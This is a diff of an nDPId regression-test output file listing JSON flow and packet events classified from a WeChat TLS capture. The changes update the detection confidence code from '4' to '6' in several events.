00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1492167367489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367489,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0UGZAAEAGxN7AqAFny82XotNNAbtphJenp1y9yYAQAOW6bQAAAQEICgAwyBZFrUyc"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167377896,"flow_last_seen":1492167377896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167377896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1492167377896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KM9AAEAGqhzAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT1vHQAAAQEICgAw0kAycerX"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1492167377936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377936,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0Fj0AADQGCA\/YOs2OwKgBZwG7wnvXK\/KwzDlUhIAQAVQWugAAAQEICjJymzYAMHos"} @@ -113,25 +113,25 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1492167378926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378926,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cOpAAEAGpFLAqAFny82XotNPAbtxraOrAAAAAKACchDymgAAAgQFtAQCCAoAMNNBAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1492167379033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379033,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG7005qx4IjSnNKJ6ASN8i96gAAAgQFoAQCCApF0b0+ADDTAgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1492167379034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379034,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0mSVAAEAGfB\/AqAFny82XotNOAbtKc0onaseCJIAQAOUjLAAAAQEICgAw01xF0b0+"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1492167379279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379279,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG7009k83t+ca2jrKASN8iurAAAAgQFoAQCCApFrVgaADDTQQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1492167379279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379279,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cOtAAEAGpFnAqAFny82XotNPAbtxraOsZPN7f4AQAOUT8AAAAQEICgAw05lFrVga"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167380581,"flow_last_seen":1492167380581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167380581,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1492167380581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380581,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8GvtAAEAG+kHAqAFny82XotNQAbtFV84kAAAAAKACchDy2AAAAgQFtAQCCAoAMNTfAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1492167380894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380894,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701DDsQ6LRVfOJaASN8i7gwAAAgQFoAQCCApFrVm2ADDU3wEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1492167380894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167380894,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0GvxAAEAG+kjAqAFny82XotNQAbtFV84lw7EOjIAQAOUg0QAAAQEICgAw1S1FrVm2"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 